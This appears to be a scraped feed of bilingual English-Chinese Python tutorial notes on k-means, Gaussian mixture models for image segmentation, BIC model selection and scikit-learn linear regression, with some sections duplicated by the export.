    segmented = gmm_labels.reshape(original_shape[0], original_shape[1])

    import matplotlib.pyplot as plt

    plt.imshow(segmented, cmap='gray')
    <matplotlib.image.AxesImage at 0x1ee04598c10>

    png

    52b - Understanding Gaussian Mixture Model -GMM- using 1D- 2D- and 3D examples

    • Demonstration of GMM on 1D, 2D, and 3D data.

    For 1D

    • First we generate data by sampling random data from two normal distributions

      • 首先,我们通过从两个正态分布中抽样随机数据来生成数据
    • Then, we decmpose it into 3 (or different number) gaussians.

      • 然后,我们将其分解为3个(或不同的数字)高斯函数。
    • Finally, we plot the original data and the decomposed Gaussians.

      • 最后,绘制了原始数据和分解后的高斯数据。

    • Do something similar for 2D and 3D cases…

      • 对 2D 和 3D 情况做类似的事情……
    • Generate data, perform GMM and plot individual components.

      • 生成数据,执行 GMM 并绘制单个组件。
    from sklearn import mixture
    import matplotlib.pyplot as plt
    import numpy as np
    import scipy.stats as stats
    • Create some data

    • Draw samples from different normal distributions so we get data that is good to demonstrate GMM. Different mean and Std. dev.

      • 从不同的正态分布中抽取样本,这样我们得到的数据可以很好地演示 GMM。不同的平均值和标准。
    • Concatenate to create a single data set

    # 均值为 5 方差为 5 的 1000 个数据 和 均值为 10 方差为 2 的 1000 个数据
    # 合并起来就是 2000 个数据
    x = np.concatenate((np.random.normal(5, 5, 1000), np.random.normal(10, 2, 1000)))
    plt.plot(x)
    [<matplotlib.lines.Line2D at 0x1fc9d0cd7c0>]

    png

    plt.hist(x, bins=100)

    png

    f = x.reshape(-1, 1)
    • We created data from two normal distributions but for the fun of it let us decompose our data into 3 Gaussians. n_components=3
      • 我们从两个正态分布创建了数据,但为了有趣,我们将数据分解为 3 个高斯分布。
    g = mixture.GaussianMixture(n_components=3,covariance_type='full')
    g.fit(f)
    weights = g.weights_ # 权重
    means = g.means_ # 均值
    covars = g.covariances_ # 协方差
    x_axis = x
    x_axis.sort()

    plt.hist(f, bins=100, histtype='bar', density=True, ec='red', alpha=0.5)
    plt.plot(x_axis,weights[0]*stats.norm.pdf(x_axis,means[0],np.sqrt(covars[0])).ravel(), c='red')
    plt.plot(x_axis,weights[1]*stats.norm.pdf(x_axis,means[1],np.sqrt(covars[1])).ravel(), c='green')
    plt.plot(x_axis,weights[2]*stats.norm.pdf(x_axis,means[2],np.sqrt(covars[2])).ravel(), c='blue')

    plt.grid()
    plt.show()

    png


    2D example

    from sklearn.datasets import make_blobs
    import numpy as np
    from matplotlib import pyplot as plt
    • Generate some data
    X, y_true = make_blobs(n_samples=400, centers=4,
    cluster_std=0.60, random_state=0)
    X = X[:, ::-1] # flip axes for better plotting 翻转坐标轴可以更好地绘图

    rng = np.random.RandomState(13)
    X_stretched = np.dot(X, rng.randn(2, 2))
    plt.scatter(X_stretched[:, 0], X_stretched[:, 1], s=7, cmap='viridis')
    <matplotlib.collections.PathCollection at 0x1fc9eac9310>

    png

    from sklearn.mixture import GaussianMixture as GMM

    gmm = GMM(n_components=4, covariance_type='full', random_state=42)
    from matplotlib.patches import Ellipse


    def draw_ellipse(position, covariance, ax=None, **kwargs):
    """
    Draw an ellipse with a given position and covariance
    画一个具有给定位置和协方差的椭圆
    """
    ax = ax or plt.gca()

    # Convert covariance to principal axes 将协方差转换为主轴
    if covariance.shape == (2, 2):
    U, s, Vt = np.linalg.svd(covariance)
    angle = np.degrees(np.arctan2(U[1, 0], U[0, 0]))
    width, height = 2 * np.sqrt(s)
    else:
    angle = 0
    width, height = 2 * np.sqrt(covariance)

    # Draw the Ellipse
    for nsig in range(1, 4):
    ax.add_patch(Ellipse(position, nsig * width, nsig * height,
    angle, **kwargs))


    def plot_gmm(gmm, X, label=True, ax=None):
    ax = ax or plt.gca()
    labels = gmm.fit(X).predict(X)
    if label:
    ax.scatter(X[:, 0], X[:, 1], c=labels, s=7, cmap='viridis', zorder=2)
    else:
    ax.scatter(X[:, 0], X[:, 1], s=7, zorder=2)
    ax.axis('equal')

    w_factor = 0.2 / gmm.weights_.max()
    for pos, covar, w in zip(gmm.means_, gmm.covariances_, gmm.weights_):
    draw_ellipse(pos, covar, alpha=w * w_factor)
    plot_gmm(gmm, X_stretched)

    png


    3D

    import numpy as np
    from sklearn.mixture import GaussianMixture
    from matplotlib import pyplot as plt
    • Generate 3D data with 4 clusters set gaussian ceters and covariances in 3D
      • 生成具有 4 个聚类的三维数据,集合高斯中心和三维协方差
    means = np.array([[0.5, 0.0, 0.0],
    [0.0, 0.0, 0.0],
    [-0.5, -0.5, -0.5],
    [-0.8, 0.3, 0.4]])

    covs = np.array([np.diag([0.01, 0.01, 0.03]),
    np.diag([0.08, 0.01, 0.01]),
    np.diag([0.01, 0.05, 0.01]),
    np.diag([0.03, 0.07, 0.01])])

    n_gaussians = means.shape[0] # Number of clusters 集群数量

    N = 1000 # Number of points to be generated for each cluster. 为每个集群生成的点数。
    points = []
    for i in range(len(means)):
    x = np.random.multivariate_normal(means[i], covs[i], N )
    points.append(x)
    points = np.concatenate(points)
    • Plot
    fig = plt.figure()
    ax = fig.add_subplot(111, projection='3d')
    ax.scatter(points[:,0], points[:,1], points[:,2], s=1, alpha=1)
    ax.view_init(35.246, 45)
    plt.show()

    png

    • Fit the gaussian model
    gmm = GaussianMixture(n_components=n_gaussians, covariance_type='diag')
    gmm.fit(points)
    • Functions to visualize data 可视化数据的函数
    import matplotlib.cm as cmx


    def plot_sphere(w=0, c=[0,0,0], r=[1, 1, 1], subdev=10, ax=None, sigma_multiplier=3):
    '''
    plot a sphere surface
    Input:
    c: 3 elements list, sphere center
    r: 3 element list, sphere original scale in each axis ( allowing to draw elipsoids)
    subdiv: scalar, number of subdivisions (subdivision^2 points sampled on the surface)
    ax: optional pyplot axis object to plot the sphere in.
    sigma_multiplier: sphere additional scale (choosing an std value when plotting gaussians)
    Output:
    ax: pyplot axis object
    '''

    if ax is None:
    fig = plt.figure()
    ax = fig.add_subplot(111, projection='3d')
    pi = np.pi
    cos = np.cos
    sin = np.sin
    phi, theta = np.mgrid[0.0:pi:complex(0,subdev), 0.0:2.0 * pi:complex(0,subdev)]
    x = sigma_multiplier*r[0] * sin(phi) * cos(theta) + c[0]
    y = sigma_multiplier*r[1] * sin(phi) * sin(theta) + c[1]
    z = sigma_multiplier*r[2] * cos(phi) + c[2]
    cmap = cmx.ScalarMappable()
    cmap.set_cmap('jet')
    c = cmap.to_rgba(w)

    ax.plot_surface(x, y, z, color=c, alpha=0.2, linewidth=1)

    return ax


    def visualize_3d_gmm(points, w, mu, stdev):
    '''
    plots points and their corresponding gmm model in 3D
    Input:
    points: N X 3, sampled points
    w: n_gaussians, gmm weights
    mu: 3 X n_gaussians, gmm means
    stdev: 3 X n_gaussians, gmm standard deviation (assuming diagonal covariance matrix)
    Output:
    None
    '''

    n_gaussians = mu.shape[1]
    N = int(np.round(points.shape[0] / n_gaussians))
    # Visualize data
    fig = plt.figure(figsize=(8, 8))
    axes = fig.add_subplot(111, projection='3d')
    axes.set_xlim([-1, 1])
    axes.set_ylim([-1, 1])
    axes.set_zlim([-1, 1])
    plt.set_cmap('Set1')
    colors = cmx.Set1(np.linspace(0, 1, n_gaussians))
    for i in range(n_gaussians):
    idx = range(i * N, (i + 1) * N)
    axes.scatter(points[idx, 0], points[idx, 1], points[idx, 2], alpha=0.3, c=colors[i])
    plot_sphere(w=w[i], c=mu[:, i], r=stdev[:, i], ax=axes)

    plt.title('3D GMM')
    axes.set_xlabel('X')
    axes.set_ylabel('Y')
    axes.set_zlabel('Z')
    axes.view_init(35.246, 45)
    plt.show()
    visualize_3d_gmm(points, gmm.weights_, gmm.means_.T, np.sqrt(gmm.covariances_).T)

    png

    53 - How to pick optimal number of parameters for your unsupervised machine learning model

    import numpy as np
    import cv2
    from matplotlib import pyplot as plt

    img = cv2.imread('images/alloy.jpg')
    img2 = img.reshape((-1, 3))
    plt.imshow(img)
    <matplotlib.image.AxesImage at 0x2650b465fd0>

    png

    from sklearn.mixture import GaussianMixture as GMM

    n_components = np.arange(1, 10)
    gmm_models = [GMM(n, covariance_type='tied').fit(img2) for n in n_components]
    plt.plot(n_components, [m.bic(img2) for m in gmm_models], label='BIC')
    plt.xlabel('n_components')
    Text(0.5, 0, 'n_components')

    png

    所以 n 取 2 最合适。

    54 - Unsupervised and supervised machine learning - a reminder

    比较 Unsupervised and supervised machine learning

    ]]>
    + 正文

    50 - What is k-means clustering and how to code it in Python

    1
    2
    3
    4
    import pandas as pd

    df = pd.read_excel('data/K_Means.xlsx')
    df.head()
    X Y
    0 1 42
    1 2 46
    2 3 51
    3 4 20
    4 5 30
    1
    2
    import seaborn as sns
    sns.regplot(x=df['X'], y=df['Y'], fit_reg=False)
    <AxesSubplot:xlabel='X', ylabel='Y'>

    png
    我们知道初始值的选取对结果的影响很大,对初始值选择的改进是很重要的一部分。在所有的改进算法中,K-means++ 最有名。

    K-means++ 算法步骤如下所示:

    1. 随机选取一个中心点 $a_1$;
    2. 计算数据到之前 n 个聚类中心最远的距离 $D(x)$,并以一定概率 $\frac{D(x)^2}{\Sigma D(x)^2}$ 选择新中心点 $a_i$;
    3. 重复第二步。

    ​ 简单的来说,就是 K-means++ 就是选择离已选中心点最远的点。这也比较符合常理,聚类中心当然是互相离得越远越好。

    ​ 但是这个算法的缺点在于,难以并行化。所以 k-means II 改变取样策略,并非按照 k-means++ 那样每次遍历只取样一个样本,而是每次遍历取样 $k$ 个,重复该取样过程 $\log(n)$ 次,则得到 $k\log(n)$ 个样本点组成的集合,然后从这些点中选取 $k$ 个。当然一般也不需要 $\log(n)$ 次取样,5 次即可。

    1
    2
    3
    4
    5
    from sklearn.cluster import KMeans

    kmeans = KMeans(n_clusters=3, init='k-means++', max_iter=300, n_init=10, random_state=0)
    model = kmeans.fit(df)
    predicted_values = kmeans.predict(df)
    1
    2
    3
    4
    from matplotlib import pyplot as plt

    plt.scatter(df['X'], df['Y'], c=predicted_values, s=50, cmap='viridis')
    plt.scatter(kmeans.cluster_centers_[:, 0], kmeans.cluster_centers_[:, 1], s=200, c='black', alpha=0.5)
    <matplotlib.collections.PathCollection at 0x2e8afc39d00>

    png

    51 - Image Segmentation using K-means

    1
    2
    3
    4
    5
    6
    import numpy as np
    import matplotlib.pyplot as plt
    import cv2

    img = cv2.imread('images/BSE_Image.jpg')
    plt.imshow(img)
    <matplotlib.image.AxesImage at 0x202a78459d0>

    png

    • 将图像变成一维的
    1
    2
    img2 = img.reshape((-1, 3))
    img2 = np.float32(img2)
    • Now we apply the KMeans function. Before that we need to specify the criteria. My criteria is such that, whenever 10 iterations of algorithm is ran, or an accuracy of epsilon = 1.0 is reached, stop the algorithm and return the answer.

      • 现在我们应用 KMeans 函数。在此之前,我们需要指定标准。我的标准是这样的,每当算法运行 10 次迭代,或达到 epsilon = 1.0 的精度时,停止算法并返回答案。
    • criteria : It is the iteration termination criteria. When this criteria is satisfied, algorithm iteration stops. Actually, it should be a tuple of 3 parameters. They are ( type, max_iter, epsilon ):

      • 它是迭代终止条件。当满足该条件时,算法迭代停止。实际上,它应该是一个包含 3 个参数的元组。

      • type of termination criteria. It has 3 flags as below:

        • cv.TERM_CRITERIA_EPS - stop the algorithm iteration if specified accuracy, epsilon, is reached.
          • 如果达到指定的精度 epsilon,则停止算法迭代。
        • cv.TERM_CRITERIA_MAX_ITER - stop the algorithm after the specified number of iterations, max_iter.
          • 在指定的迭代次数 max_iter 后停止算法。
        • cv.TERM_CRITERIA_EPS + cv.TERM_CRITERIA_MAX_ITER - stop the iteration when any of the above condition is met.
          • 当满足上述任何一个条件时,对迭代进行顶迭代。
      • max_iter - An integer specifying maximum number of iterations.

        • 指定最大迭代次数的整数。
      • epsilon - Required accuracy

        • 所需的精度
    1
    criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)
    • Clusters

    • attempts : Flag to specify the number of times the algorithm is executed using different initial labellings. The algorithm returns the labels that yield the best compactness. This compactness is returned as output.

      • 标志指定使用不同初始标记执行算法的次数。该算法返回产生最佳紧凑性的标签。这种紧凑度作为输出返回。
    • flags : This flag is used to specify how initial centers are taken. Normally two flags are used for this : cv.KMEANS_PP_CENTERS and cv.KMEANS_RANDOM_CENTERS.

      • 此标志用于指定如何获取初始中心。通常使用两个标志:cv.KMEANS_PP_CENTERS 和 cv.KMEANS_RANDOM_CENTERS。
    • compactness : It is the sum of squared distance from each point to their corresponding centers.

      • 紧凑度:它是每个点到它们相应中心的距离平方和。
    • labels : This is the label array (same as ‘code’ in previous article) where each element marked ‘0’, ‘1’…

      • 这是标签数组(与上一篇文章中的’code’相同),其中每个元素标记为’0’,‘1’…
    • centers : This is array of centers of clusters.

      • 这是集群中心的数组。
    1
    2
    3
    4
    5
    k = 3
    attempts = 10
    ret, label, center = cv2.kmeans(img2, k, None, criteria, attempts, cv2.KMEANS_PP_CENTERS)
    center = np.uint8(center)
    res = center[label.flatten()]
    • 将数组重新转成原来的形状
    1
    res2 = res.reshape((img.shape))
    • 最终将图像缩减成了只有 3 种颜色

    • Color Quantization is the process of reducing number of colors in an image. One reason to do so is to reduce the memory. Sometimes, some devices may have limitation such that it can produce only limited number of colors. In those cases also, color quantization is performed. Here we use k-means clustering for color quantization.

      • 颜色量化是减少图像中颜色数量的过程。
        这样做的一个原因是减少内存。
        有时,一些设备可能有限制,例如它只能产生有限数量的颜色。
        在这些情况下,还执行颜色量化。
        这里我们使用 k-means 聚类进行颜色量化。
    • There is nothing new to be explained here. There are 3 features, say, R,G,B. So we need to reshape the image to an array of Mx3size (M is number of pixels in image). And after the clustering, we apply centroid values (it is also R,G,B) to all pixels, such that resulting image will have specified number of colors. And again we need to reshape it back to the shape of original image.

      • 这里没有什么新东西要解释的。有三个特征,R,G,B。因此我们需要将图像重塑为 Mx3 大小的数组(M 为图像中的像素数)。在聚类之后,我们对所有像素应用质心值(它也是 R,G,B),这样得到的图像将具有指定数量的颜色。我们需要重新塑造它回到原始图像的形状。
    1
    center
    array([[251, 251, 251],       [151, 151, 151],       [ 47,  47,  47]], dtype=uint8)
    1
    plt.imshow(res2)
    <matplotlib.image.AxesImage at 0x202a83ac2b0>

    png

    52 - What is GMM and how to use it for Image segmentation

    1
    2
    3
    4
    5
    import numpy as np
    import cv2

    img = cv2.imread('images/plant_cells.jpg')
    img2 = img.reshape((-1, 3))
    1
    2
    3
    4
    5
    6
    from sklearn.mixture import GaussianMixture as GMM

    gmm_model = GMM(n_components=2, covariance_type='tied').fit(img2)
    gmm_labels = gmm_model.predict(img2)
    original_shape = img.shape
    segmented = gmm_labels.reshape(original_shape[0], original_shape[1])
    • 图像被分成 0 和 1 两类
    1
    2
    3
    import matplotlib.pyplot as plt

    plt.imshow(segmented, cmap='gray')
    <matplotlib.image.AxesImage at 0x1ee043bb4c0>

    png


    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    import numpy as np
    import cv2

    img = cv2.imread('images/BSE_Image.jpg')
    img2 = img.reshape((-1, 3))

    from sklearn.mixture import GaussianMixture as GMM

    # 分成 4 类
    gmm_model = GMM(n_components=4, covariance_type='tied').fit(img2)
    gmm_labels = gmm_model.predict(img2)
    original_shape = img.shape
    segmented = gmm_labels.reshape(original_shape[0], original_shape[1])

    import matplotlib.pyplot as plt

    plt.imshow(segmented, cmap='gray')
    <matplotlib.image.AxesImage at 0x1ee04598c10>

    png

    52b - Understanding Gaussian Mixture Model -GMM- using 1D- 2D- and 3D examples

    • Demonstration of GMM on 1D, 2D, and 3D data.

    For 1D

    • First we generate data by sampling random data from two normal distributions

      • 首先,我们通过从两个正态分布中抽样随机数据来生成数据
    • Then, we decmpose it into 3 (or different number) gaussians.

      • 然后,我们将其分解为3个(或不同的数字)高斯函数。
    • Finally, we plot the original data and the decomposed Gaussians.

      • 最后,绘制了原始数据和分解后的高斯数据。

    • Do something similar for 2D and 3D cases…

      • 对 2D 和 3D 情况做类似的事情……
    • Generate data, perform GMM and plot individual components.

      • 生成数据,执行 GMM 并绘制单个组件。
    1
    2
    3
    4
    from sklearn import mixture
    import matplotlib.pyplot as plt
    import numpy as np
    import scipy.stats as stats
    • Create some data

    • Draw samples from different normal distributions so we get data that is good to demonstrate GMM. Different mean and Std. dev.

      • 从不同的正态分布中抽取样本,这样我们得到的数据可以很好地演示 GMM。不同的平均值和标准。
    • Concatenate to create a single data set

    1
    2
    3
    4
    # 均值为 5 方差为 5 的 1000 个数据 和 均值为 10 方差为 2 的 1000 个数据
    # 合并起来就是 2000 个数据
    x = np.concatenate((np.random.normal(5, 5, 1000), np.random.normal(10, 2, 1000)))
    plt.plot(x)
    [<matplotlib.lines.Line2D at 0x1fc9d0cd7c0>]

    png

    1
    plt.hist(x, bins=100)

    png

    1
    f = x.reshape(-1, 1)
    • We created data from two normal distributions but for the fun of it let us decompose our data into 3 Gaussians. n_components=3
      • 我们从两个正态分布创建了数据,但为了有趣,我们将数据分解为 3 个高斯分布。
    1
    2
    3
    4
    5
    g = mixture.GaussianMixture(n_components=3,covariance_type='full')
    g.fit(f)
    weights = g.weights_ # 权重
    means = g.means_ # 均值
    covars = g.covariances_ # 协方差
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    x_axis = x
    x_axis.sort()

    plt.hist(f, bins=100, histtype='bar', density=True, ec='red', alpha=0.5)
    plt.plot(x_axis,weights[0]*stats.norm.pdf(x_axis,means[0],np.sqrt(covars[0])).ravel(), c='red')
    plt.plot(x_axis,weights[1]*stats.norm.pdf(x_axis,means[1],np.sqrt(covars[1])).ravel(), c='green')
    plt.plot(x_axis,weights[2]*stats.norm.pdf(x_axis,means[2],np.sqrt(covars[2])).ravel(), c='blue')

    plt.grid()
    plt.show()

    png


    2D example

    1
    2
    3
    from sklearn.datasets import make_blobs
    import numpy as np
    from matplotlib import pyplot as plt
    • Generate some data
    1
    2
    3
    4
    5
    6
    7
    X, y_true = make_blobs(n_samples=400, centers=4,
    cluster_std=0.60, random_state=0)
    X = X[:, ::-1] # flip axes for better plotting 翻转坐标轴可以更好地绘图

    rng = np.random.RandomState(13)
    X_stretched = np.dot(X, rng.randn(2, 2))
    plt.scatter(X_stretched[:, 0], X_stretched[:, 1], s=7, cmap='viridis')
    <matplotlib.collections.PathCollection at 0x1fc9eac9310>

    png

    1
    2
    3
    from sklearn.mixture import GaussianMixture as GMM

    gmm = GMM(n_components=4, covariance_type='full', random_state=42)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    from matplotlib.patches import Ellipse


    def draw_ellipse(position, covariance, ax=None, **kwargs):
    """
    Draw an ellipse with a given position and covariance
    画一个具有给定位置和协方差的椭圆
    """
    ax = ax or plt.gca()

    # Convert covariance to principal axes 将协方差转换为主轴
    if covariance.shape == (2, 2):
    U, s, Vt = np.linalg.svd(covariance)
    angle = np.degrees(np.arctan2(U[1, 0], U[0, 0]))
    width, height = 2 * np.sqrt(s)
    else:
    angle = 0
    width, height = 2 * np.sqrt(covariance)

    # Draw the Ellipse
    for nsig in range(1, 4):
    ax.add_patch(Ellipse(position, nsig * width, nsig * height,
    angle, **kwargs))


    def plot_gmm(gmm, X, label=True, ax=None):
    ax = ax or plt.gca()
    labels = gmm.fit(X).predict(X)
    if label:
    ax.scatter(X[:, 0], X[:, 1], c=labels, s=7, cmap='viridis', zorder=2)
    else:
    ax.scatter(X[:, 0], X[:, 1], s=7, zorder=2)
    ax.axis('equal')

    w_factor = 0.2 / gmm.weights_.max()
    for pos, covar, w in zip(gmm.means_, gmm.covariances_, gmm.weights_):
    draw_ellipse(pos, covar, alpha=w * w_factor)
    1
    plot_gmm(gmm, X_stretched)

    png


    3D

    1
    2
    3
    import numpy as np
    from sklearn.mixture import GaussianMixture
    from matplotlib import pyplot as plt
    • Generate 3D data with 4 clusters set gaussian ceters and covariances in 3D
      • 生成具有 4 个聚类的三维数据,集合高斯中心和三维协方差
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    means = np.array([[0.5, 0.0, 0.0],
    [0.0, 0.0, 0.0],
    [-0.5, -0.5, -0.5],
    [-0.8, 0.3, 0.4]])

    covs = np.array([np.diag([0.01, 0.01, 0.03]),
    np.diag([0.08, 0.01, 0.01]),
    np.diag([0.01, 0.05, 0.01]),
    np.diag([0.03, 0.07, 0.01])])

    n_gaussians = means.shape[0] # Number of clusters 集群数量

    N = 1000 # Number of points to be generated for each cluster. 为每个集群生成的点数。
    points = []
    for i in range(len(means)):
    x = np.random.multivariate_normal(means[i], covs[i], N )
    points.append(x)
    points = np.concatenate(points)
    • Plot
    1
    2
    3
    4
    5
    fig = plt.figure()
    ax = fig.add_subplot(111, projection='3d')
    ax.scatter(points[:,0], points[:,1], points[:,2], s=1, alpha=1)
    ax.view_init(35.246, 45)
    plt.show()

    png

    • Fit the gaussian model
    1
    2
    gmm = GaussianMixture(n_components=n_gaussians, covariance_type='diag')
    gmm.fit(points)
    • Functions to visualize data 可视化数据的函数
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    import matplotlib.cm as cmx


    def plot_sphere(w=0, c=[0,0,0], r=[1, 1, 1], subdev=10, ax=None, sigma_multiplier=3):
    '''
    plot a sphere surface
    Input:
    c: 3 elements list, sphere center
    r: 3 element list, sphere original scale in each axis ( allowing to draw elipsoids)
    subdiv: scalar, number of subdivisions (subdivision^2 points sampled on the surface)
    ax: optional pyplot axis object to plot the sphere in.
    sigma_multiplier: sphere additional scale (choosing an std value when plotting gaussians)
    Output:
    ax: pyplot axis object
    '''

    if ax is None:
    fig = plt.figure()
    ax = fig.add_subplot(111, projection='3d')
    pi = np.pi
    cos = np.cos
    sin = np.sin
    phi, theta = np.mgrid[0.0:pi:complex(0,subdev), 0.0:2.0 * pi:complex(0,subdev)]
    x = sigma_multiplier*r[0] * sin(phi) * cos(theta) + c[0]
    y = sigma_multiplier*r[1] * sin(phi) * sin(theta) + c[1]
    z = sigma_multiplier*r[2] * cos(phi) + c[2]
    cmap = cmx.ScalarMappable()
    cmap.set_cmap('jet')
    c = cmap.to_rgba(w)

    ax.plot_surface(x, y, z, color=c, alpha=0.2, linewidth=1)

    return ax


    def visualize_3d_gmm(points, w, mu, stdev):
    '''
    plots points and their corresponding gmm model in 3D
    Input:
    points: N X 3, sampled points
    w: n_gaussians, gmm weights
    mu: 3 X n_gaussians, gmm means
    stdev: 3 X n_gaussians, gmm standard deviation (assuming diagonal covariance matrix)
    Output:
    None
    '''

    n_gaussians = mu.shape[1]
    N = int(np.round(points.shape[0] / n_gaussians))
    # Visualize data
    fig = plt.figure(figsize=(8, 8))
    axes = fig.add_subplot(111, projection='3d')
    axes.set_xlim([-1, 1])
    axes.set_ylim([-1, 1])
    axes.set_zlim([-1, 1])
    plt.set_cmap('Set1')
    colors = cmx.Set1(np.linspace(0, 1, n_gaussians))
    for i in range(n_gaussians):
    idx = range(i * N, (i + 1) * N)
    axes.scatter(points[idx, 0], points[idx, 1], points[idx, 2], alpha=0.3, c=colors[i])
    plot_sphere(w=w[i], c=mu[:, i], r=stdev[:, i], ax=axes)

    plt.title('3D GMM')
    axes.set_xlabel('X')
    axes.set_ylabel('Y')
    axes.set_zlabel('Z')
    axes.view_init(35.246, 45)
    plt.show()
    1
    visualize_3d_gmm(points, gmm.weights_, gmm.means_.T, np.sqrt(gmm.covariances_).T)

    png

    53 - How to pick optimal number of parameters for your unsupervised machine learning model

    1
    2
    3
    4
    5
    6
    7
    import numpy as np
    import cv2
    from matplotlib import pyplot as plt

    img = cv2.imread('images/alloy.jpg')
    img2 = img.reshape((-1, 3))
    plt.imshow(img)
    <matplotlib.image.AxesImage at 0x2650b465fd0>

    png

    1
    2
    3
    4
    from sklearn.mixture import GaussianMixture as GMM

    n_components = np.arange(1, 10)
    gmm_models = [GMM(n, covariance_type='tied').fit(img2) for n in n_components]
    1
    2
    plt.plot(n_components, [m.bic(img2) for m in gmm_models], label='BIC')
    plt.xlabel('n_components')
    Text(0.5, 0, 'n_components')

    png

    所以 n 取 2 最合适。

    54 - Unsupervised and supervised machine learning - a reminder

    比较 Unsupervised and supervised machine learning

    ]]>
    @@ -8982,7 +8982,7 @@ /posts/DIP-Python%20tutorials%20for%20image%20processing%20and%20machine%20learning(43-49)-Regression/ - 正文

    43 - What is machine learning anyway

    • Machine Learning 机器学习
      • Supervised Learning 监督学习
        • Classification problem 分类问题
          • Support Vector Machines 支持向量机
          • Discriminant Analysis 判别分析法
          • Naive Bayes 朴素贝叶斯
          • Nearest Neighbor 邻近算法
        • Regression 回归
          • Linear Regression, GLM 线性回归,广义线性模型
          • SVR, GPR 支持向量回归,高斯过程回归
          • Ensemble Methods 集成学习算法
          • Decision Trees 决策树
          • Neural Networks 神经网络
      • Unsupervised Learning 无监督学习
        • Clustering 聚类
          • K-Means, K-Medoids, Fuzzy C-Means
          • Hierarchical 层次聚类
          • Gaussian Mixture 高斯混合模型
          • Neural Networks 神经网络
          • Hidden Markov Model 隐马尔科夫模型

    • Machine Learning VS Deep Learning

    png

    ​ 在数据量大的情况下使用深度学习效果更好。

    png

    44 - What is linear regression

    ​ 介绍了下线性回归以及损失函数。

    45 - Linear regression using Sci-Kit Learn in Python

    import pandas as pd
    import numpy as np
    import matplotlib.pyplot as plt
    from sklearn import linear_model

    df = pd.read_csv('data/cells.csv')
    df
    time cells
    0 0.0 205
    1 0.5 225
    2 1.0 238
    3 1.5 240
    4 2.0 248
    5 2.5 260
    6 3.0 265
    7 3.5 283
    8 4.0 301
    9 4.5 305
    10 5.0 309
    plt.xlabel('time')
    plt.ylabel('cells')
    plt.scatter(df.time, df.cells, color='red', marker='+')
    <matplotlib.collections.PathCollection at 0x2c7bd4eb0d0>

    png

    • x independent (time)

    • y dependent - we are predicting Y

    x_df = df[['time']]
    x_df
    time
    0 0.0
    1 0.5
    2 1.0
    3 1.5
    4 2.0
    5 2.5
    6 3.0
    7 3.5
    8 4.0
    9 4.5
    10 5.0
    x_df.dtypes
    time    float64dtype: object
    y_df = df.cells
    • 创建并训练模型
    reg = linear_model.LinearRegression()  # Create an instance of the model
    reg.fit(x_df, y_df) # Training the model (fitting a line)
    • 预测模型
    # Predict
    reg.predict([[2.3]])
    C:\Users\gzjzx\anaconda3\lib\site-packages\sklearn\base.py:450: UserWarning: X does not have valid feature names, but LinearRegression was fitted with feature names  warnings.warn(array([257.61090909])
    • 评分
    reg.score(x_df, y_df)
    0.9784252641866715
    • Y = mx + C
    c = reg.intercept_
    m = reg.coef_
    2.3 * m + c
    array([257.61090909])
    • 预测多个数据
    cells_predict_df = pd.read_csv('data/cells_predict.csv')
    cells_predict_df.head()
    time
    0 0.1
    1 0.2
    2 0.3
    3 0.4
    4 0.5
    predicted_cells = reg.predict(cells_predict_df)
    predicted_cells
    array([212.33090909, 214.38909091, 216.44727273, 218.50545455,       220.56363636, 222.62181818, 224.68      , 226.73818182,       228.79636364, 230.85454545, 232.91272727, 234.97090909,       237.02909091, 239.08727273, 241.14545455, 243.20363636,       245.26181818, 247.32      , 249.37818182, 251.43636364,       253.49454545, 255.55272727, 257.61090909, 259.66909091,       261.72727273, 263.78545455, 265.84363636, 267.90181818,       269.96      , 272.01818182, 274.07636364, 276.13454545,       278.19272727, 280.25090909, 282.30909091, 284.36727273,       286.42545455, 288.48363636, 290.54181818, 292.6       ])
    • 将预测数据合并并保存
    cells_predict_df['cells'] = predicted_cells
    cells_predict_df.head()
    time cells
    0 0.1 212.330909
    1 0.2 214.389091
    2 0.3 216.447273
    3 0.4 218.505455
    4 0.5 220.563636
    cells_predict_df.to_csv('predicted_cells.csv')

    46 - Splitting data into training and testing sets for machine learning

    import pandas as pd
    import numpy as np
    import matplotlib.pyplot as plt
    from sklearn import linear_model
    df = pd.read_csv('data/cells.csv')
    df
    time cells
    0 0.0 205
    1 0.5 225
    2 1.0 238
    3 1.5 240
    4 2.0 248
    5 2.5 260
    6 3.0 265
    7 3.5 283
    8 4.0 301
    9 4.5 305
    10 5.0 309
    x_df = df.drop('cells', axis='columns')
    y_df = df.cells
    • 分割训练集(train)和测试集(test)
    from sklearn.model_selection import train_test_split

    X_train, X_test, y_train, y_test = train_test_split(x_df, y_df, test_size=0.4, random_state=10)
    X_train
    time
    10 5.0
    3 1.5
    1 0.5
    0 0.0
    4 2.0
    9 4.5
    reg = linear_model.LinearRegression()
    reg.fit(X_train, y_train)

    prediction_test = reg.predict(X_test)
    prediction_test
    array([229.66081871, 270.73684211, 291.2748538 , 260.46783626,       281.00584795])
    • 计算均方误差
    print('Mean sq. error between y_test and predicted =', np.mean(prediction_test - y_test) ** 2)
    Mean sq. error between y_test and predicted = 7.677112273861912
    • 计算残差
    plt.scatter(prediction_test, prediction_test - y_test)
    plt.hlines(y=0, xmin=200, xmax=310) # 画一条水平线
    <matplotlib.collections.LineCollection at 0x26a2470d640>

    png

    47 - Multiple Linear Regression with SciKit-Learn in Python

    import pandas as pd

    df = pd.read_excel('data/images_analyzed.xlsx')
    df.head()
    User Time Coffee Age Images_Analyzed
    0 1 8 0 23 20
    1 1 13 0 23 14
    2 1 17 0 23 18
    3 1 22 0 23 15
    4 1 8 2 23 22
    import seaborn as sns

    sns.lmplot(x='Time', y='Images_Analyzed', data=df, hue='Age')
